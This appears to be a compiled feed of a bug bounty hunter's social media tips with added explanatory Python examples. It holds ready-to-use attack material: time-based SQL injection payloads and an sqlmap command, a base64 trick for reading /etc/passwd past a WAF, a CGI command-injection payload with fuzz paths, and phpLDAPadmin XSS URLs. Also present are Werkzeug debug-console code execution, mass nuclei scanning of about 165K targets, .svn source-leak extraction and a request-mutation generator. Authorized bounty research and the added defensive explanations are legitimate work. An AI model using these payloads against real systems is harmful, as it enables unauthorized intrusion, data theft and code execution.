7 SQLs
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%20
2 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
#bugbountytips
#bugbountytip
💕
For the first time I found a SQL Injection on the **sitemap.xml** endpoint 😎😎
#bugbountytips
#bugbountytip
target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
sleep payload
[1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s
Happy Hunting
#BugBounty
url/?f=etc/passwd ==> 403
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick for SQLi, SSTI, XSS, LFI, etc...
#bugbountytips
#bugbountytip
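What the 403 -> 200 flip above means is that the WAF matched the raw query string while the application decoded the parameter before using it. This is an added example, not code from the tip's target: a toy blocklist standing in for a WAF rule set, a vulnerable filter that only looks at the raw string, and a hardened one that normalizes the value the same way the app does (URL-decode, base64-decode) before matching. The `f` parameter name comes from the tip; the blocklist and `handle()` are constructed.

```python
"""Why base64-encoding a value turns a 403 into a 200, and the fix:
normalize before matching. Constructed example."""
import base64
import binascii
import urllib.parse

# Toy blocklist standing in for a WAF rule set (constructed).
BLOCKED = ("etc/passwd", "<script", "union select", "{{")


def app_resolve(param: str) -> str:
    """Application side: the file name may arrive raw or base64-encoded."""
    try:
        return base64.b64decode(param, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return param


def naive_waf(query: str) -> bool:
    """Vulnerable filter: one URL-decode, then substring match on the raw string."""
    q = urllib.parse.unquote_plus(query).lower()
    return any(bad in q for bad in BLOCKED)


def normalizing_waf(query: str) -> bool:
    """Hardened filter: match against every form the app may derive from the
    value (raw, double-URL-decoded, base64-decoded)."""
    views = set()
    for values in urllib.parse.parse_qs(query, keep_blank_values=True).values():
        for v in values:
            views.update({v, urllib.parse.unquote_plus(v), app_resolve(v)})
    return any(bad in v.lower() for v in views for bad in BLOCKED)


def handle(query: str, waf) -> int:
    """HTTP status the server would return for ?<query> behind the given WAF."""
    if waf(query):
        return 403
    path = app_resolve(urllib.parse.parse_qs(query).get("f", [""])[0])
    return 200 if path else 400


if __name__ == "__main__":
    for q in ("f=etc/passwd", "f=L2V0Yy9wYXNzd2Q%3D"):
        print(q, "naive:", handle(q, naive_waf), "normalizing:", handle(q, normalizing_waf))
```

The lesson for the defender is the mirror of the tip: a filter must see the value in the same form the application will use it, or it filters nothing.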
Burp Extensions
403 Bypasser
5GC API Parser
Active Scan++
Backslash Powered Scanner
CO2
IP Rotate
J2EEScan
JS Link Finder
JS Miner
Logger++
Log Viewer
GAP
Distribute Damage
IIS Tilde
Look Over There
Param Miner
Software Vulnerability Scanner
SAML Raider
Autorize
Encode IP
Asset Discovery
Slides of my talk at bsidesodisha
about
• Build your setup for hunting
Tools, Extensions, Etc…
• Quick Orwa Methodology 2023
• SQL Injection
• and for sure
#bugbountytips
feel free to ask about anything in the comments and I will try to explain ❤️❤️
Add this endpoint to your wordlist
phpldapadmin/index.php
and try to get in with the default login
and if there's no luck
try these 2 XSSs
domain/phpldapadmin/cmd.php
domain/cmd.php
1/2
#bugbountytips
#bugbountytip
I was working with
r3aper__ for the last 6 months and I learned a lot from this amazing hunter
He started creating write-ups and this is the first one
Bypassing an Admin Panel with SQL Injection
#bugbountytips
I earned a great bounty for my submission on
@bugcrowd
#ItTakesACrowd
#bugbountytips
#bugbountytip
Werkzeug framework that has debug enabled, so I was able to access the target[.]com/console endpoint
python os commands
>>> import os
>>> os.listdir('/')
Happy hunting
story of a very quick RCE
Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can add these paths to your wordlist
cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips
❤️
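The reason `db_prefix=%26id%26` gives RCE: the CGI URL-decodes the value to `&id&` and pastes it into a shell command line, where `&` ends the intended command and starts `id`. This is an added example, not the target's script: the real reset tool is replaced by `echo` so the vulnerable path can be run safely, and the hardened version validates the prefix against an allowlist and builds an argv list that never goes through a shell. The regex, the `/opt/dmt/reset` path and `--db-prefix` flag are assumptions.

```python
"""Shell command injection through a CGI parameter, vulnerable path beside
the hardened one. Constructed example."""
import re
import subprocess
import urllib.parse

PREFIX_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # assumed allowlist for a DB prefix


def cgi_param(query_string: str, name: str) -> str:
    """What the CGI sees after URL-decoding, e.g. '%26id%26' -> '&id&'."""
    return urllib.parse.parse_qs(query_string).get(name, [""])[0]


def vulnerable_command(db_prefix: str) -> str:
    """Vulnerable: command line built by string concatenation for a shell."""
    return f"echo resetting {db_prefix}"  # the real script would call its reset binary


def run_vulnerable(query_string: str) -> str:
    """Execute the way a naive CGI does (sh -c) and return combined output.
    With db_prefix=%26id%26 the shell runs 'echo resetting' and then 'id'."""
    cmd = vulnerable_command(cgi_param(query_string, "db_prefix"))
    proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout + proc.stderr


def safe_argv(query_string: str) -> list:
    """Hardened: allowlist the value, then build an argv list that
    subprocess.run() hands to the program with no shell parsing at all."""
    db_prefix = cgi_param(query_string, "db_prefix")
    if not PREFIX_RE.fullmatch(db_prefix):
        raise ValueError(f"rejected db_prefix: {db_prefix!r}")
    return ["/opt/dmt/reset", "--db-prefix", db_prefix]  # hypothetical tool path


if __name__ == "__main__":
    print(run_vulnerable("db_prefix=%26id%26"))  # 'uid=...' shows up: id ran
    print(safe_argv("db_prefix=prod_"))
    try:
        safe_argv("db_prefix=%26id%26")
    except ValueError as e:
        print(e)
```

Note that the fuzz line in the tip (`FUZZ=%26id%26`) works for the same reason on any parameter that reaches a shell: `&` needs no quotes to escape, so it survives contexts where `;` or `|` would be filtered.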
Today I completed 150 accepted SQL Injection reports just on
@Bugcrowd
There are other SQLis on H1, Meta and external programs
I am happy that I got this amazing number of SQL injection discoveries in just 2 years with 0 experience in all security stuff
I did it, you can do it✌️
I started hunting on this BMW program at
03:00AM; at 03:20AM I submitted the first SQL injection
Now I am going to do something new
I will pick 5-15 random hunters from my comments
and will try to get 5-15 critical/exceptional
and invite one collab, 50% for each submission
1
located SQL in a specific parameter by this sleep payload
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2
with WAF, not able to exploit via SQLmap
3
I got the origin IP
then in match & replace in Burp
1/2
#bugbountytip
#bugbountytips
I found a phpMyAdmin template on nuclei
phpmyadmin-setup.yaml
next step: edit that template for
/admin/
the template endpoint was [/pma/setup/index.php]
I found 2 on [/admin/pma/setup/index.php]
happy hunting ♥
#BugBounty
& I also earned $4,000 for my submission on
@bugcrowd
#ItTakesACrowd
Both bugs were unauthorized access to open dashboards
#bugbountytips
Scan the top 1000 ports every day, every day
naabu -list sub.txt -top-ports 1000 -exclude-ports 80,443 -o file
Old but gold
#bugbountytip
add this to your wordlist
.svn/entries
or edit the ready template
Ex:
admin/.svn/entries
next step, if you locate the svn configuration,
use svn-extractor
start looking for bugs in the source
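What svn-extractor does with a leaked `.svn/entries` is walk it: every child directory has its own `entries` file and every file has a pristine copy under `.svn/text-base/<name>.svn-base`. This is an added example, not svn-extractor's code: it parses a constructed entries file and prints the URLs to request next. The layout assumed is the pre-1.7 entries format (a version line, then records separated by a form feed, each starting with the entry name and its kind); the sample content and `https://target.example/admin/` are made up.

```python
"""Parse a leaked pre-1.7 .svn/entries file and list the next requests.
Constructed sample; format layout assumed as described in the lead-in."""

SAMPLE_ENTRIES = (
    "10\n"                                         # format version line
    "\n" "dir\n" "412\n"                           # this directory: empty name, kind, revision
    "https://svn.example.com/repo/trunk/admin\n"   # URL of this directory (constructed)
    "https://svn.example.com/repo\n"               # repository root (constructed)
    "\n\n\n"
    "\x0c\n" "config.php\n" "file\n" "\n\n\n"      # child entries: name, kind, ...
    "\x0c\n" "includes\n" "dir\n"
    "\x0c\n" "db.inc\n" "file\n"
)


def entries_version(text: str) -> str:
    """First line of the file is the entries-format version."""
    return text.split("\n", 1)[0].strip()


def parse_entries(text: str) -> list:
    """Return [(name, kind), ...] for every child entry, skipping the
    directory's own record (the first one, with the empty name)."""
    out = []
    for record in text.split("\x0c")[1:]:
        lines = record.strip("\n").split("\n")
        if len(lines) >= 2 and lines[0]:
            out.append((lines[0], lines[1]))
    return out


def next_requests(base_url: str, entries: list) -> list:
    """URLs to request from the web directory that leaked this .svn folder:
    child directories expose their own entries file, files expose their
    pristine copy under .svn/text-base/<name>.svn-base."""
    base_url = base_url.rstrip("/") + "/"
    urls = []
    for name, kind in entries:
        if kind == "dir":
            urls.append(f"{base_url}{name}/.svn/entries")
        elif kind == "file":
            urls.append(f"{base_url}.svn/text-base/{name}.svn-base")
    return urls


if __name__ == "__main__":
    found = parse_entries(SAMPLE_ENTRIES)
    print("format", entries_version(SAMPLE_ENTRIES), found)
    for u in next_requests("https://target.example/admin/", found):
        print(u)
```

The `.svn-base` copies are served as static files, so a `config.php` that the web server would normally execute comes back as source, which is where the bug hunting in the source starts.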
Just noticed that I am in the Leaderboard (All time) top 10 for P1 reports on
@Bugcrowd
and I am very happy to share this with you all
I am not that very smart hacker, and still there's a lot to learn,
so I assure you
(if I did it, you can do it) never give up ❤️
Who's excited…
Who's missing some bugbounty tips..
I will be with
@NahamSec
at
#nahamcon
this year, set up your reminder for this date
There's a live with new
#bugbountytips
at
#NahamCon
on June 17th
This talk will be free, no subscription required
GitHub
#bugbountytip
#bugbountytips
target[.]my[.]salesforce[.]com password
you can find passwords
but when you try to log in it will ask for 2FA
how can you bypass that and get a critical find?
1/2
Happy hunting all ♥
Why do they keep telling me that 🤣🤣
I know and I like it
easy P1
#bugbountytips
#bugbountytip
for Unauthorized access
replace my name with your domain name
==>
on the tab Associated Urls ==> show as 100 entries
and start having a nice day with that
Let’s make something new
Let’s keep this tweet for questions
You can ask me here in a comment and I will answer in a comment, and let’s everyone learn and find some useful questions/answers
keep this tweet as reference by re-tweeting
#bugbounty
#bugbountytips
#questions
✌️
When they asked a little girl from Palestine
What will you be when you grow up??
She said we never grow old, we die before 12 years old….
Completely true
Perfect post about SQLi
add to that
* change the request method and inject again
* inject in the URL itself
example
target/admin/1SQLPayload/xxxx
* inject the parameter name itself in a POST request
example
userSQLpayload=admin&password=admin
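The three additions above (swap the method, inject into a path segment, inject into the parameter name) are easy to forget when you test by hand, so here is an added example, not the author's tooling, that generates all of those variants from one base request. The URL `https://target.example/admin/1/xxxx` and the `user`/`password` parameters are assumptions modelled on the examples in the post; the payload is whatever you are probing with.

```python
"""Generate request variants: method swap, payload in each path segment,
payload in each parameter name. Constructed example."""
from urllib.parse import quote, urlencode, urlsplit, urlunsplit


def build(method: str, parts, params: list):
    """URL and body for a method: GET carries params in the query, POST in the body."""
    if method == "GET":
        return urlunsplit(parts._replace(query=urlencode(params))), None
    return urlunsplit(parts._replace(query="")), urlencode(params)


def variants(method: str, url: str, params: list, payload: str) -> list:
    """Return (method, url, body) triples for every mutation of the base request."""
    method = method.upper()
    parts = urlsplit(url)
    out = []

    # 1. Same request with the other method; params move between query and body.
    other = "POST" if method == "GET" else "GET"
    out.append((other,) + build(other, parts, params))

    # 2. Payload appended to each path segment: /admin/1/xxxx -> /admin/1<payload>/xxxx
    segs = parts.path.split("/")
    for i, seg in enumerate(segs):
        if not seg:
            continue
        mutated = segs[:i] + [seg + quote(payload, safe="")] + segs[i + 1:]
        out.append((method,) + build(method, parts._replace(path="/".join(mutated)), params))

    # 3. Payload in the parameter name, value untouched: user<payload>=admin
    for i, (name, value) in enumerate(params):
        mutated = params[:i] + [(name + payload, value)] + params[i + 1:]
        out.append((method,) + build(method, parts, mutated))
    return out


if __name__ == "__main__":
    base = "https://target.example/admin/1/xxxx"
    creds = [("user", "admin"), ("password", "admin")]
    for m, u, body in variants("POST", base, creds, "'"):
        print(m, u, body or "")
```

Feed the output to whatever sends your requests (Burp Intruder, a small loop around `urllib`) and run the same sleep or error-based check on each variant; the path and parameter-name positions are the ones scanners most often skip.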
#bugbountytip
#bugbountytips
for that I collected a huge number of bounty programs
here
you can download all of that with git clone ...
cd x
cat * > 1-file.txt
and now you have everything in 1 file, about 165K targets
cat 1-file.txt | nuclei -t your-private-template.yaml
#bugbountytips
If you found any bug in your testing
create a nuclei template for that and start testing that template on everything
You can test that on everything
XSS, SQL, Info Dis, Etc..
also for any
#bugbountytip
about some endpoint
you can create a template for that and test it
#bugbounty
❌Loaded my first critical bug for 2024 on
public bounty program on
@Hacker0x01
(Triaged)
❌Loaded my first critical/exceptional bug for 2024 on
public bounty program on
@intigriti
(Triaged)
❌Loaded my first P1 bug for 2024 on
public bounty program on
@Bugcrowd
(Pending)
😍
Funny
#bugbounty
story 😬
I found a critical bug on a bug bounty program on
@Bugcrowd
and that bug affected another bounty program on
@Hacker0x01
the 2 programs are public, I sent the same report twice, one here and one there
and yes I got rewarded on the 2 programs 😎😎😎
Email from a bounty program about
(New Target Added)
4-5 min later => P1 for an Auth Bypass….
Sometimes you find out that you are like the hackers in the movies🤣
I am back with a new account, same username handle
@GodfatherOrwa
So all who know me, you can follow me again 😂
And from today
A lot of
#bugbountytips
#bugbountytip
And let's get back and make it rain P1s✌️
P1 $6500
P2 $3000
P3 no bounty
Critical auth bypass marked as P3
Default credentials & LDAP injection marked as P3
Program keeps changing P1s to P3s to save budget
And changing P3s all the time after taking down the hosts
This is called commercial fraud 🤣
Sad stories 🤣
For those asking about the sqlmap command in this case
sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
I received some questions to speak about at
@bsidesahmedabad
so I added them to my talk [Power Of Recon]
1 my method to bypass WAF
2 my method to get more subdomains
3 my method to find more domains / 3rd parties / endpoints
#bugbountytips
We're rolling out the red carpet as the
#BuggyAwards
are back! 🐛🏆
Help us recognize those who have gone above and beyond in their security efforts! 🔥
Don't miss this👇
Bug here: I had access to the Symfony open profiler & toolbar
that led to a chain of bugs such as [ auth bypass , auth LFI , unauth LFI , StoredXSS , Etc...]
for more info read about
Symfony web debug toolbar & Symfony Profiler open
#bugbountytips
I still remember the first day when I asked
@XHackerx007
to collaborate with me on the
#Fisglobal
program (08 Sep 2021)
and from that date till today me & HackerX007 have been working fully on FIS, we are still finding critical bugs
we can say that we know more about FIS than FIS employees
1/2
#BugBounty
#infosec
I'm just back 😎
My account was closed by Twitter itself
After this, someone else took over my account
It wasn't hacked
It was something bad from Twitter
Twitter support is very bad
The story:
1/5
cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1
cmd.php?server_id=<script>alert('Orwa')</script>
you can also try replacing cmd.php with index.php
2/2
Happy hunting
@Bugcrowd
For those asking what wordlist I use
I use mostly
and
Important note: all the time update your wordlist manually by adding interesting endpoints / dirs that you have found
👾 Coming up next in our Tech Speaker series we have
@GodfatherOrwa
! 🎯 He is all set to enlighten us with his insights on "The Power of Recon."
🧑🏼💻 A distinguished security researcher and Bug Bounty Hunter who boasts impressive accolades as a Hack Cup and LevelUpX champion,
it's the best time to look for 0Days/CVEs during the Christmas holiday 😈
and yes the first 0day (medium) has been located 👍
I'm working now on the second 0day (critical) ✌️
#bugbounty
guess what.....
let's do something new
besides that I'm going to speak tomorrow at
@bsidesahmedabad
don't be shy to catch me and talk to me, tell me where you are stuck; in my turn I assure we will fix that by giving you personalized
#bugbountytip
/s
best wishes everyone♥
@HusseiN98D
All respect for you Hussein
I donate 20% of every bounty I get to help poor people
In the past, I was suffering from poverty, so I could not complete my studies and did not obtain certificates
1/2
@amit___009
Continue fuzzing, as example
Target/BPDEV_FUZZ
This wordlist will be helpful
And valid endpoints such as 403/301/302/200
Send them again to the IIS scanner
@abdallah_osman4
@0x_rood
1 install the waymore tool
-i domain -mode U
And send all the results to Burp
2 start Bing and Google dorking in the same proxied browser to get all the results into Burp
3 install the GAP extension and then send the target to GAP
there's a lot to do, this is the start
@Jhaddix
@Bugcrowd
Hi sir, no you're not alone 😊
This is a screenshot from my last talk at Bsides, I was talking about that
Playing with custom headers can bring good results
This one is not about the bug itself
It's about how you test, and never give up and keep testing and trying
You should keep this write-up next to you when you hunt for ATO
Well done Omar 👍👍
In the Arab community a lot of people, when they report a bug to a VDP program, start making courses, videos, tips, etc..
That's why there's tons of bad content for Arabic bug bounty
the best Arabic content I have found ever till today is
@SirBagoza
content and I suggest that
@intigriti
It depends how you look for RCE
Some look for RCE as a bug
Some look for RCE as impact
As example LFI to RCE (the bug is LFI and the impact is RCE)
I look for RCE as impact, not bug
& I automate on bugs that can lead to RCEs